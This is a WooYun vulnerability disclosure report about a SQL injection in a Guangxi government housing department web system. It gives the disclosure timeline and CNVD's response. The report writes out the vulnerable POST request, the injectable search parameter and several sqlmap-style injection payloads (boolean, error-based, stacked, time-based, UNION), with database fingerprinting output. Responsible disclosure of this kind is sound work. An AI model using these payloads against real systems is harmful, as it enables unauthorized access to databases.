
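Vulnerability summary

Bug ID: wooyun-2015-0160280

Title: MSSQL injection in a system of the Guangxi Department of Housing and Urban-Rural Development (41 databases involved)

Vendor: http://221.7.246.44:8018/WebInfo/Default.aspx

Author: 无名人

Submitted: 2015-12-11 12:36

Fixed: 2016-01-28 17:10

Disclosed: 2016-01-28 17:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org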



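Vulnerability details

Disclosure status:

2015-12-11: Details reported to the vendor; awaiting vendor handling
2015-12-15: Vendor confirmed; details disclosed to the vendor only
2015-12-25: Details disclosed to core white hats and experts in related fields
2016-01-04: Details disclosed to regular white hats
2016-01-14: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public

Brief description:

RT

Detailed description:

System: **.**.**.**:8018/WebInfo/Default.aspx
Vulnerable request: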

POST /WebInfo/Enterprise/Enterprise.aspx HTTP/1.1
Host: **.**.**.**:8018
Proxy-Connection: keep-alive
Content-Length: 4422
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: **.**.**.**:8018
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:8018/WebInfo/Enterprise/Enterprise.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=hdyin1550ajs4l2s0qlges45
__VIEWSTATE=[base64 value omitted]&__VIEWSTATEGENERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=[base64 value omitted]&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24DanWeiName=%E5%85%A8%E5%B7%9E*&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24DanWeiType=&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24ZiZhiNum=&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24CityNum=&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24Edate=&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24BtnSearch=%E6%90%9C%E7%B4%A2


The ctl00%24ctl00%24ContentPlaceHolder1%24Search%24DanWeiName parameter is injectable.

---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=[base64 value omitted]&__VIEWSTATEGENERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=[base64 value omitted]&ctl00$ctl00$ContentPlaceHolder1$Search$DanWeiName=%E5%85%A8%E5%B7%9E%' AND 9231=9231 AND '%'='&ctl00$ctl00$ContentPlaceHolder1$Search$DanWeiType=&ctl00$ctl00$ContentPlaceHolder1$Search$ZiZhiNum=&ctl00$ctl00$ContentPlaceHolder1$Search$CityNum=&ctl00$ctl00$ContentPlaceHolder1$Search$Edate=&ctl00$ctl00$ContentPlaceHolder1$Search$BtnSearch=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=[base64 value omitted]&__VIEWSTATEGENERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=[base64 value omitted]&ctl00$ctl00$ContentPlaceHolder1$Search$DanWeiName=%E5%85%A8%E5%B7%9E%' AND 3956=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3956=3956) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113))) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$Search$DanWeiType=&ctl00$ctl00$ContentPlaceHolder1$Search$ZiZhiNum=&ctl00$ctl00$ContentPlaceHolder1$Search$CityNum=&ctl00$ctl00$ContentPlaceHolder1$Search$Edate=&ctl00$ctl00$ContentPlaceHolder1$Search$BtnSearch=%E6%90%9C%E7%B4%A2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=[base64 value omitted]&__VIEWSTATEGENERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=[base64 value omitted]&ctl00$ctl00$ContentPlaceHolder1$Search$DanWeiName=%E5%85%A8%E5%B7%9E%';WAITFOR DELAY '0:0:5'--&ctl00$ctl00$ContentPlaceHolder1$Search$DanWeiType=&ctl00$ctl00$ContentPlaceHolder1$Search$ZiZhiNum=&ctl00$ctl00$ContentPlaceHolder1$Search$CityNum=&ctl00$ctl00$ContentPlaceHolder1$Search$Edate=&ctl00$ctl00$ContentPlaceHolder1$Search$BtnSearch=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: __VIEWSTATE=[base64 value omitted]&__VIEWSTATEGENERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=[base64 value omitted]&ctl00$ctl00$ContentPlaceHolder1$Search$DanWeiName=%E5%85%A8%E5%B7%9E%' WAITFOR DELAY '0:0:5'--&ctl00$ctl00$ContentPlaceHolder1$Search$DanWeiType=&ctl00$ctl00$ContentPlaceHolder1$Search$ZiZhiNum=&ctl00$ctl00$ContentPlaceHolder1$Search$CityNum=&ctl00$ctl00$ContentPlaceHolder1$Search$Edate=&ctl00$ctl00$ContentPlaceHolder1$Search$BtnSearch=%E6%90%9C%E7%B4%A2
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: __VIEWSTATE=[base64 value omitted]&__VIEWSTATEGENERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=[base64 value omitted]&ctl00$ctl00$ContentPlaceHolder1$Search$DanWeiName=%E5%85%A8%E5%B7%9E%' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(68)+CHAR(110)+CHAR(69)+CHAR(80)+CHAR(73)+CHAR(122)+CHAR(78)+CHAR(90)+CHAR(66)+CHAR(88)+CHAR(67)+CHAR(119)+CHAR(116)+CHAR(111)+CHAR(122)+CHAR(114)+CHAR(82)+CHAR(116)+CHAR(115)+CHAR(99)+CHAR(69)+CHAR(80)+CHAR(71)+CHAR(74)+CHAR(74)+CHAR(119)+CHAR(68)+CHAR(121)+CHAR(104)+CHAR(112)+CHAR(68)+CHAR(75)+CHAR(121)+CHAR(72)+CHAR(72)+CHAR(87)+CHAR(73)+CHAR(120)+CHAR(107)+CHAR(75)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)-- &ctl00$ctl00$ContentPlaceHolder1$Search$DanWeiType=&ctl00$ctl00$ContentPlaceHolder1$Search$ZiZhiNum=&ctl00$ctl00$ContentPlaceHolder1$Search$CityNum=&ctl00$ctl00$ContentPlaceHolder1$Search$Edate=&ctl00$ctl00$ContentPlaceHolder1$Search$BtnSearch=%E6%90%9C%E7%B4%A2
---
[04:25:09] [INFO] testing Microsoft SQL Server
[04:25:11] [INFO] confirming Microsoft SQL Server
[04:25:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012

Proof of vulnerability:

41 databases:

[Screenshot: 数据库.png (database list)]

Fix:

@@

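Copyright notice: please credit the source when reposting: 无名人@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-12-15 11:51

Vendor reply:

CNVD confirmed and reproduced the reported vulnerability. It has been passed on through CNCERT to the Guangxi branch center, which will coordinate follow-up handling with the organization that manages the website.

Latest status:

None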

